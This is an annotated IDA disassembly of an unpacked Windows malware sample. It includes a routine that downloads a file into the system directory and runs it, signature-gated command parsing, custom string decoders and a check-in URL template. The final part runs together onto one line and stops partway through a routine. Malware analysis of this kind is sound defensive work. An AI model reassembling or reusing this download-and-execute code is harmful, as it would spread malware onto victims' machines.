;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : D9E002026F71F1D9805AAE5D7FFA3FAE
; File Name : u:\work\d9e002026f71f1d9805aae5d7ffa3fae_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31420000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
;
; Analyst notes (added in review; everything below is Intel/MASM syntax, 32-bit):
;   * The segment is named UPX0, is Read/Write/Execute, and the input file name
;     ends in "_unpacked.exe": this listing is of an image dumped after
;     unpacking, not of the file as it arrived on disk. The MD5 above is the
;     one IDA recorded for its input file.
;   * Each "dd" below is an import-table slot that already holds a resolved
;     pointer ("resolved to->DLL.Function"). The pointer values presumably
;     reflect the DLL builds and load addresses of the analysis machine, so the
;     API names, not the addresses, are the reusable information.
;   * Imports are grouped below by the capability they give the sample; the
;     grouping is a reading aid and does not change any data.

include uni.inc ; see unicode subdir of ida for info on unicode

.686p
.mmx
.model flat

; ===========================================================================

; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
        assume cs:UPX0
        ;org 31421000h
        assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing

; ---- ADVAPI32: registry access ---------------------------------------------
dword_31421000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExA
dword_31421004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExA
dword_31421008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExA
dword_3142100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31422882+1Dr
dword_31421010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueA
dword_31421014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31422882+4Er ...
; ---- ADVAPI32: shutdown control and CryptoAPI (hash + signature verify) -----
dword_31421018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownA
dword_3142101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHash
dword_31421020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashData
dword_31421024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureA
dword_31421028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHash
dword_3142102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKey
dword_31421030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContext
dword_31421034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextA
dword_31421038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey
        align 10h
; ---- KERNEL32: memory, files, process enumeration/termination, threads ------
; Triage pointers: CreateToolhelp32Snapshot/Process32First/Process32Next with
; TerminateProcess (process enumeration and kill), OpenProcess with
; WriteProcessMemory (writing into another process), CopyFileA/WinExec/
; CreateProcessA (self-copy and launch). The routines using most of these are
; outside this excerpt.
dword_31421040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFree
dword_31421044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc
dword_31421048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA
dword_3142104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiA
dword_31421050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA
dword_31421054 dd 7C86136Dh ; resolved to->KERNEL32.WinExec
dword_31421058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshot
dword_3142105C dd 7C863DE5h ; resolved to->KERNEL32.Process32First
dword_31421060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess
dword_31421064 dd 7C863F58h ; resolved to->KERNEL32.Process32Next
dword_31421068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31422B67+8Fr
dword_3142106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventA
dword_31421070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject
dword_31421074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31422A9B+Fr
dword_31421078 dd 7C810D87h ; resolved to->KERNEL32.WriteFile
dword_3142107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_314211A0+F6r ...
dword_31421080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_314221C4+57r
dword_31421084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31421422+64r ...
dword_31421088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31422A9B+40r
dword_3142108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31422A9B+1Br
dword_31421090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoA
dword_31421094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31421801+16Cr ...
dword_31421098 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchange
dword_3142109C dd 7C810111h ; resolved to->KERNEL32.lstrcpynA
dword_314210A0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess
dword_314210A4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31421DF0+2Cr
dword_314210A8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_314223B2+116r
dword_314210AC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemory
dword_314210B0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_3142292E+92r
dword_314210B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31422336r
dword_314210B8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount
dword_314210BC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexA
dword_314210C0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31421F52+12r
dword_314210C4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessA
dword_314210C8 dd 7C80A017h ; resolved to->KERNEL32.SetEvent
dword_314210CC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventA
dword_314210D0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_314221C4+66r ...
dword_314210D4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_314225C3+3Fr ...
dword_314210D8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFile
dword_314210DC dd 7C810A77h ; resolved to->KERNEL32.GetFileSize
dword_314210E0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31422A9B+C3r
dword_314210E4 dd 7C910331h, 0 ; resolved to->NTDLL.RtlGetLastWin32Error
; ---- MSVCRT -----------------------------------------------------------------
dword_314210EC dd 77C371BCh ; resolved to->MSVCRT.srand
dword_314210F0 dd 77C46F70h ; resolved to->MSVCRT.memcpy
dword_314210F4 dd 77C478A0h ; resolved to->MSVCRT.strlen
dword_314210F8 dd 77C475F0h ; resolved to->MSVCRT.memset
dword_314210FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31421F73:loc_31421F84r ...
; ---------------------------------------------------------------------------
; NOTE(review): the three "instructions" and the stray byte below are most
; likely one more import slot that IDA disassembled as code. Their encodings
; are 94h, 5Ch, C3h followed by db 77h, i.e. the little-endian dword 77C35C94h,
; which lies in the same range as the MSVCRT pointers around it, and the only
; reference is a DATA XREF from loc_31422CD0 (the handler address that
; sub_31421422 pushes when it builds its exception frame). Presumably an
; MSVCRT exception-handler import; confirm in the database before relying on
; it. Do not read this as a stack-pivot gadget.
loc_31421100: ; DATA XREF: UPX0:loc_31422CD0r
        xchg eax, esp
        pop esp
        retn
; ---------------------------------------------------------------------------
        db 77h
dword_31421104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3142207E:loc_314220AFr ...
dword_31421108 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31421422+AAr
        align 10h
; ---- USER32: window lookup (used to pick a process), string formatting ------
dword_31421110 dd 7E42DE87h ; resolved to->USER32.FindWindowA
dword_31421114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindow
dword_31421118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessId
dword_3142111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_314215C7+77r ...
        dd 0
; ---- WININET: HTTP client (check-in and download, see sub_314215C7/sub_314211A0)
dword_31421124 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_314215C7+9Dr
dword_31421128 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_314215C7+89r
dword_3142112C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandle
dword_31421130 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:314227A2r
dword_31421134 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_314215C7+B0r
        dd 0
; ---- WS2_32: raw sockets, both client (connect/send/recv) and server
;      (bind/listen/accept) sides are imported --------------------------------
dword_3142113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartup
dword_31421140 dd 71AB3E00h ; resolved to->WS2_32.bind
dword_31421144 dd 71AB88D3h ; resolved to->WS2_32.listen
dword_31421148 dd 71AC1028h ; resolved to->WS2_32.accept
dword_3142114C dd 71AB50C8h ; resolved to->WS2_32.gethostname
dword_31421150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastError
dword_31421154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname
dword_31421158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_314221C4+ACr
dword_3142115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31422712+Dr
dword_31421160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_314221C4+F0r
dword_31421164 dd 71AB406Ah ; resolved to->WS2_32.connect
dword_31421168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_3142207E+67r ...
dword_3142116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31421801+1D8r ...
dword_31421170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_3142207E+128r
dword_31421174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_3142207E+12Fr
        align 10h
; NOTE(review): the two records below (-1, 0, handler pointer) look like
; compiler-generated exception scope tables. dword_31421180 is the one that
; sub_31421422 pushes into its exception frame; the user of dword_31421190 is
; not in this excerpt.
dword_31421180 dd 0FFFFFFFFh, 0
        dd offset nullsub_1
        align 10h
dword_31421190 dd 0FFFFFFFFh, 0
        dd offset nullsub_2
        align 10h

; =============== S U B R O U T I N E =======================================
;
; sub_314211A0 -- fetch a URL into a new file under the system directory and
;                 pass the file path to sub_31421FA3.
; Convention: cdecl-style (the caller in sub_31421422 pops the argument).
; In:   arg_0 = pointer to the URL string handed to InternetOpenUrlA
;               (the slot is reused afterwards to hold the URL handle)
; Out:  eax = 0  file written and sub_31421FA3 called
;             1  InternetOpenA failed
;             2  CreateFileA failed
;             3  InternetOpenUrlA failed
; Locals: var_110 = path buffer, var_4 = file handle, var_8 = bytes read,
;         var_C = bytes written
; Analyst notes:
;   * Path = GetSystemDirectoryA() + string at dword_314241F8 + 6 bytes written
;     by sub_31421F73 + string at dword_314241F0. Neither string is in this
;     excerpt. sub_31421F73 presumably generates random characters (the import
;     table lists it as a user of MSVCRT.rand); confirm.
;   * Only one InternetReadFile call is made (at most 100000h bytes) and the
;     results of InternetReadFile and WriteFile are not checked.
;   * sub_31421FA3(path, 5) is not in this excerpt; presumably it launches the
;     file (5 would match a show-window value); confirm.
;   * The two WinINet handles are not closed in this routine.
;   * Defender view: a file newly created in the system directory by a process
;     that has just made an HTTP request with the fixed User-Agent below is the
;     observable side effect of this routine.
; Attributes: bp-based frame

sub_314211A0 proc near ; CODE XREF: sub_31421422+16Dp

var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8

        push ebp
        mov ebp, esp
        sub esp, 110h
        push ebx
        push esi
        xor esi, esi ; esi = 0 for the whole routine
        push edi
        push esi
        push esi
        push esi
        push 1 ; access type 1 (direct, no proxy lookup)
        push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
        call dword_31421128 ; InternetOpenA
        mov ebx, eax ; ebx = session handle
        cmp ebx, esi
        jnz short loc_314211CB
        push 1 ; return code 1
        jmp loc_31421261
; ---------------------------------------------------------------------------

loc_314211CB: ; CODE XREF: sub_314211A0+22j
        lea eax, [ebp+var_110]
        push 104h
        push eax
        call dword_3142108C ; GetSystemDirectoryA
        mov edi, dword_31421088 ; edi = lstrcatA
        lea eax, [ebp+var_110]
        push offset dword_314241F8
        push eax
        call edi ; dword_31421088
        lea eax, [ebp+var_110]
        push 6
        push eax
        call dword_31421084 ; lstrlenA
        lea eax, [ebp+eax+var_110] ; eax = end of the path built so far
        push eax
        call sub_31421F73 ; (end-of-path, 6): helper outside this excerpt
        pop ecx
        lea eax, [ebp+var_110]
        pop ecx
        push offset dword_314241F0
        push eax
        call edi ; dword_31421088
        push esi
        push esi
        push 2 ; creation disposition 2 (CREATE_ALWAYS)
        push esi
        push esi
        lea eax, [ebp+var_110]
        push 40000000h ; desired access 40000000h (GENERIC_WRITE)
        push eax
        call dword_31421080 ; CreateFileA
        cmp eax, 0FFFFFFFFh
        mov [ebp+var_4], eax
        jnz short loc_31421241
        push 2 ; return code 2
        jmp short loc_31421261
; ---------------------------------------------------------------------------

loc_31421241: ; CODE XREF: sub_314211A0+9Bj
        push esi
        push esi
        push esi
        push esi
        push [ebp+arg_0]
        push ebx
        call dword_31421124 ; InternetOpenUrlA
        cmp eax, esi
        mov [ebp+arg_0], eax ; arg_0 now holds the URL handle
        jnz short loc_31421264
        push [ebp+var_4]
        call dword_3142107C ; CloseHandle
        push 3 ; return code 3

loc_31421261: ; CODE XREF: sub_314211A0+26j
                ; sub_314211A0+9Fj
        pop eax ; eax = the return code pushed on the failing path
        jmp short loc_314212B5
; ---------------------------------------------------------------------------

loc_31421264: ; CODE XREF: sub_314211A0+B4j
        mov edi, 100000h ; edi = download buffer size
        push edi
        call sub_31422CA5 ; presumably an allocator (result used as buffer) -- confirm
        mov ebx, eax
        pop ecx
        lea eax, [ebp+var_8]
        push eax
        push edi
        push ebx
        push [ebp+arg_0]
        call dword_31421134 ; InternetReadFile
        lea eax, [ebp+var_C]
        push esi
        push eax
        push [ebp+var_8]
        push ebx
        push [ebp+var_4]
        call dword_31421078 ; WriteFile
        push [ebp+var_4]
        call dword_3142107C ; CloseHandle
        lea eax, [ebp+var_110]
        push 5
        push eax
        call sub_31421FA3 ; (path, 5): helper outside this excerpt
        push ebx
        call sub_31422CB9 ; presumably frees the download buffer -- confirm
        add esp, 0Ch
        xor eax, eax ; return code 0

loc_314212B5: ; CODE XREF: sub_314211A0+C2j
        pop edi
        pop esi
        pop ebx
        leave
        retn
sub_314211A0 endp

; =============== S U B R O U T I N E =======================================
;
; sub_314212BA -- fixed-size text-to-binary decoder: every 3 input bytes are
;                 combined into 2 output bytes until 30h (48) bytes have been
;                 written, so 72 input bytes are consumed.
; Convention: cdecl-style (caller cleans the stack).
; In:   arg_0 = input pointer, arg_4 = output pointer,
;       arg_8 = byte subtracted from each output byte's low part
;               (the only visible caller passes 0)
; Out:  none meaningful in eax
; Note: there is no length or NUL check on the input; the caller bounds it.

sub_314212BA proc near ; CODE XREF: sub_31421422+F8p

arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch

        mov ecx, [esp+arg_4]
        mov eax, [esp+arg_0]
        push ebx
        push esi
        push edi
        or edi, 0FFFFFFFFh
        inc eax ; eax = input + 1 (body addresses eax-1, eax, eax+1)
        push 0Fh
        lea esi, [ecx+1] ; esi = output + 1 (body addresses esi-1, esi)
        sub edi, ecx ; edi = -1 - output, so edi+esi = bytes written so far
        pop ecx ; ecx = 0Fh

loc_314212D1: ; CODE XREF: sub_314212BA+56j
        mov dl, [eax]
        mov bl, [eax-1]
        add edx, ecx
        add bl, cl
        sar edx, 4
        and dl, 3
        sub dl, [esp+0Ch+arg_8]
        shl bl, 2
        or dl, bl
        mov [esi-1], dl ; first output byte of the pair
        mov dl, [eax+1]
        mov bl, [eax]
        dec dl
        add bl, cl
        and dl, cl
        sub dl, [esp+0Ch+arg_8]
        add eax, 3 ; next 3-byte input group
        shl bl, 4
        and bl, 0F0h
        or dl, bl
        mov [esi], dl ; second output byte of the pair
        inc esi
        inc esi
        lea edx, [edi+esi]
        cmp edx, 30h ; stop after 48 output bytes
        jl short loc_314212D1
        pop edi
        pop esi
        pop ebx
        retn
sub_314212BA endp

; =============== S U B R O U T I N E =======================================
;
; sub_31421316 -- rotate one letter by a signed amount within its alphabet.
; Convention: cdecl-style (caller cleans the stack).
; In:   arg_0 = character (byte), arg_4 = shift (26 is added when negative)
; Out:  al = alphabet[(index + shift) mod 26] for A-Z or a-z (case kept);
;            any character found in neither alphabet is returned unchanged
; Locals: var_1C / var_38 = stack copies (27 bytes each, NUL included) of the
;         upper- and lower-case alphabets; strchr is used to find the index.
; Attributes: bp-based frame

sub_31421316 proc near ; CODE XREF: sub_3142139B+27p

var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch

        push ebp
        mov ebp, esp
        sub esp, 38h
        push ebx
        push esi
        push edi
        push 6
        pop ecx
        mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        lea edi, [ebp+var_1C]
        push 6
        rep movsd ; 6 dwords + 1 word + 1 byte = 27 bytes
        movsw
        movsb
        pop ecx
        mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
        lea edi, [ebp+var_38]
        mov ebx, [ebp+arg_4] ; ebx = shift
        rep movsd
        movsw
        test ebx, ebx ; flags consumed by jge; movsb does not change them
        movsb
        jge short loc_31421349
        add ebx, 1Ah ; negative shift: add 26

loc_31421349: ; CODE XREF: sub_31421316+2Ej
        movsx edi, [ebp+arg_0]
        mov esi, dword_31421108 ; esi = strchr
        lea eax, [ebp+var_1C]
        push edi
        push eax
        call esi ; dword_31421108
        pop ecx
        test eax, eax
        pop ecx
        jz short loc_31421373
        lea ecx, [ebp+var_1C]
        push 1Ah
        sub eax, ecx ; eax = index in the upper-case alphabet
        pop ecx
        add eax, ebx
        cdq
        idiv ecx ; edx = (index + shift) mod 26
        mov al, [ebp+edx+var_1C]
        jmp short loc_31421396
; ---------------------------------------------------------------------------

loc_31421373: ; CODE XREF: sub_31421316+48j
        lea eax, [ebp+var_38]
        push edi
        push eax
        call esi ; dword_31421108
        pop ecx
        test eax, eax
        pop ecx
        jz short loc_31421393
        lea ecx, [ebp+var_38]
        push 1Ah
        sub eax, ecx ; eax = index in the lower-case alphabet
        pop ecx
        add eax, ebx
        cdq
        idiv ecx
        mov al, [ebp+edx+var_38]
        jmp short loc_31421396
; ---------------------------------------------------------------------------

loc_31421393: ; CODE XREF: sub_31421316+68j
        mov al, [ebp+arg_0] ; not a letter: pass through

loc_31421396: ; CODE XREF: sub_31421316+5Bj
                ; sub_31421316+7Bj
        pop edi
        pop esi
        pop ebx
        leave
        retn
sub_31421316 endp

; =============== S U B R O U T I N E =======================================
;
; sub_3142139B -- decode a NUL-terminated string with a running key.
; Convention: cdecl-style (caller cleans the stack).
; In:   arg_0 = destination buffer, arg_4 = encoded source string,
;       arg_8 = initial key (letter index)
; Out:  destination holds the decoded string, NUL-terminated
; Per input byte: subtract 2, rotate by minus the current key through
; sub_31421316, store the result; if the byte after the subtraction is a
; letter, its alphabet index becomes the key for the next byte.
; Note: nothing here bounds the destination; the caller must bound the source.
; Attributes: bp-based frame

sub_3142139B proc near ; CODE XREF: sub_31421422+D6p

arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h

        push ebp
        mov ebp, esp
        mov eax, [ebp+arg_4]
        push esi
        mov esi, [ebp+arg_8] ; esi = current key
        push edi
        mov al, [eax]
        test al, al
        jz short loc_314213F8 ; empty source: just terminate the destination
        mov edi, [ebp+arg_0] ; edi = write cursor
        push ebx

loc_314213B0: ; CODE XREF: sub_3142139B+58j
        sub al, 2
        inc [ebp+arg_4] ; advance the source pointer
        mov bl, al
        mov eax, esi
        neg eax ; shift = -key
        mov byte ptr [ebp+arg_0], bl ; arg_0 slot reused to pass the character
        push eax
        push [ebp+arg_0]
        call sub_31421316
        mov [edi], al
        pop ecx
        inc edi
        cmp bl, 61h
        pop ecx
        jl short loc_314213DC
        cmp bl, 7Ah
        jg short loc_314213DC
        movsx esi, bl
        sub esi, 61h ; lower-case letter: key = index from 'a'

loc_314213DC: ; CODE XREF: sub_3142139B+34j
                ; sub_3142139B+39j
        cmp bl, 41h
        jl short loc_314213EC
        cmp bl, 5Ah
        jg short loc_314213EC
        movsx esi, bl
        sub esi, 41h ; upper-case letter: key = index from 'A'

loc_314213EC: ; CODE XREF: sub_3142139B+44j
                ; sub_3142139B+49j
        mov eax, [ebp+arg_4]
        mov al, [eax]
        test al, al
        jnz short loc_314213B0
        pop ebx
        jmp short loc_314213FB
; ---------------------------------------------------------------------------

loc_314213F8: ; CODE XREF: sub_3142139B+Fj
        mov edi, [ebp+arg_0]

loc_314213FB: ; CODE XREF: sub_3142139B+5Bj
        and byte ptr [edi], 0 ; NUL-terminate the output
        pop edi
        pop esi
        pop ebp
        retn
sub_3142139B endp

; =============== S U B R O U T I N E =======================================
;
; sub_31421402 -- one-letter checksum over a 30h-byte buffer.
; In:   arg_0 = pointer to 48 bytes
; Out:  eax = 61h + (sum of the 48 unsigned bytes mod 26), i.e. 'a'..'z'

sub_31421402 proc near ; CODE XREF: sub_31421422+104p

arg_0 = dword ptr 4

        xor eax, eax
        xor ecx, ecx

loc_31421406: ; CODE XREF: sub_31421402+12j
        mov edx, [esp+arg_0]
        movzx edx, byte ptr [ecx+edx]
        add eax, edx
        inc ecx
        cmp ecx, 30h
        jl short loc_31421406
        push 1Ah
        cdq
        pop ecx
        idiv ecx
        mov eax, edx
        add eax, 61h
        retn
sub_31421402 endp

; =============== S U B R O U T I N E =======================================
;
; sub_31421422 -- parse a downloaded response, authenticate it, and on success
;                 pass the decoded string to sub_314211A0 (download routine).
; Convention: cdecl-style (caller cleans the stack).
; In:   arg_0 = pointer to the response text
; Out:  eax = var_128: 1 by default, 0 only when the signature check passed
;             and sub_314211A0 was called
; Response layout as read by the code, starting at the marker "zer0":
;   "zer0" | key letter 'a'..'z' | encoded string | '~' | checksum letter |
;   72 characters decoding to a 30h-byte signature
; Checks, in order: marker present; more than 50h characters follow it; key
; letter in range; '~' present; checksum letter equals
; sub_31421402(signature bytes); CryptoAPI verification of the signature over
; the decoded string (sub_3142179A) using the 44h-byte key blob at
; dword_31424000 (imported by sub_3142172F).
; Locals: var_11C = decoded string (100h bytes), var_164 = signature (30h),
;         var_124 = {provider handle, key handle}, var_174 = verify result
; Analyst notes:
;   * The text after the marker is cut with a NUL at offset 100h before any
;     decoding, which keeps the decoded string inside var_11C.
;   * The return value of sub_3142172F (key import) is not tested; a failed
;     import is only caught later because verification then fails.
;   * Defender view: instructions to this sample are signature-gated, so
;     a response without a valid signature is ignored by this path.
; Attributes: bp-based frame

sub_31421422 proc near ; CODE XREF: sub_314215C7+BAp

var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8

        push ebp
        mov ebp, esp
        push 0FFFFFFFFh
        push offset dword_31421180
        push offset loc_31422CD0
        mov eax, large fs:0
        push eax
        mov large fs:0, esp ; install the exception frame built above
        sub esp, 164h
        push ebx
        push esi
        push edi
        mov [ebp+var_128], 1 ; default result: 1 (rejected)
        and [ebp+var_4], 0
        push offset aZer0 ; "zer0"
        push [ebp+arg_0]
        call dword_31421104 ; strstr
        pop ecx
        pop ecx
        mov edi, eax
        mov [ebp+var_130], edi
        test edi, edi
        jz loc_314215A8
        add edi, 4 ; skip the 4-character marker
        mov [ebp+var_130], edi
        jz loc_314215A8
        push edi
        call dword_31421084 ; lstrlenA
        mov [ebp+var_1C], eax
        cmp eax, 50h
        jle loc_314215A8 ; need more than 50h characters after the marker
        and byte ptr [edi+100h], 0 ; hard cap: terminate the text at offset 100h
        mov al, [edi]
        mov [ebp+var_168], al
        movsx ebx, al
        sub ebx, 61h ; ebx = key = letter index from 'a'
        mov [ebp+var_12C], ebx
        js loc_314215A8
        cmp ebx, 1Ah
        jge loc_314215A8
        inc edi
        mov [ebp+var_130], edi
        push 7Eh ; '~' separates the encoded string from the trailer
        push edi
        call dword_31421108 ; strchr
        pop ecx
        pop ecx
        mov esi, eax
        mov [ebp+var_134], esi
        test esi, esi
        jz loc_314215A8
        mov al, [esi]
        mov [ebp+var_170], al ; save the separator ...
        and byte ptr [esi], 0 ; ... and terminate the encoded string in place
        push ebx
        push edi
        lea eax, [ebp+var_11C]
        push eax
        call sub_3142139B ; decode into var_11C
        mov al, [ebp+var_170]
        mov [esi], al ; restore the separator
        inc esi ; esi -> checksum letter
        mov [ebp+var_130], esi
        xor edi, edi ; edi = 0 from here on
        push edi
        lea eax, [ebp+var_164]
        push eax
        lea eax, [esi+1] ; encoded signature starts after the checksum letter
        push eax
        call sub_314212BA ; 72 characters -> 30h bytes in var_164
        lea eax, [ebp+var_164]
        push eax
        call sub_31421402
        add esp, 1Ch ; pops the arguments of all three helper calls
        cmp [esi], al
        jnz short loc_314215A8 ; checksum letter mismatch
        push 44h
        push offset dword_31424000
        lea eax, [ebp+var_124]
        push eax
        call sub_3142172F ; acquire provider + import key blob (result unchecked)
        add esp, 0Ch
        lea eax, [ebp+var_174]
        push eax
        push 30h
        lea eax, [ebp+var_164]
        push eax
        lea eax, [ebp+var_11C]
        push eax
        call dword_31421084 ; lstrlenA
        push eax
        lea eax, [ebp+var_11C]
        push eax
        lea eax, [ebp+var_124]
        push eax
        call sub_3142179A ; hash decoded string, verify 30h-byte signature
        add esp, 18h
        test eax, eax
        jnz short loc_3142159B ; hashing step failed
        cmp [ebp+var_174], edi
        jz short loc_3142159B ; CryptVerifySignatureA returned FALSE
        lea eax, [ebp+var_11C]
        push eax
        call sub_314211A0 ; decoded string is used as the URL to fetch
        pop ecx
        mov [ebp+var_128], edi ; result 0 (accepted)

loc_3142159B: ; CODE XREF: sub_31421422+15Cj
                ; sub_31421422+164j
        lea eax, [ebp+var_124]
        push eax
        call sub_3142177E ; destroy key, release provider
        pop ecx

loc_314215A8: ; CODE XREF: sub_31421422+4Ej
                ; sub_31421422+5Dj ...
        or [ebp+var_4], 0FFFFFFFFh
        call nullsub_1
        mov eax, [ebp+var_128]
        mov ecx, [ebp+var_10]
        mov large fs:0, ecx ; unlink the exception frame
        pop edi
        pop esi
        pop ebx
        leave
        retn
sub_31421422 endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1.
PRESS KEYPAD "+" TO EXPAND] ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314215C7 proc near ; CODE XREF: sub_314216A2+2Ap var_E8 = byte ptr -0E8h var_84 = byte ptr -84h var_4 = byte ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 0E8h push ebx push esi push edi push 4000h call sub_31422CA5 pop ecx mov esi, eax lea eax, [ebp+var_E8] push 63h push eax push 7 push 400h call dword_31421090 ; GetLocaleInfoA xor ebx, ebx cmp byte ptr [ebp+arg_4], bl jz short loc_3142162F lea eax, [ebp+var_E8] push eax lea eax, [ebp+var_84] push dword_31424FEC push dword_31425004 push offset aFgnsdrjyrsert ; "fgnsdrjyrsert" push [ebp+arg_0] push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"... push eax call dword_3142111C ; wsprintfA add esp, 1Ch jmp short loc_31421647 ; --------------------------------------------------------------------------- loc_3142162F: ; CODE XREF: sub_314215C7+34j push [ebp+arg_0] lea eax, [ebp+var_84] push offset aHttpS ; "http://%s" push eax call dword_3142111C ; wsprintfA add esp, 0Ch loc_31421647: ; CODE XREF: sub_314215C7+66j push ebx push ebx push ebx push ebx push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"... 
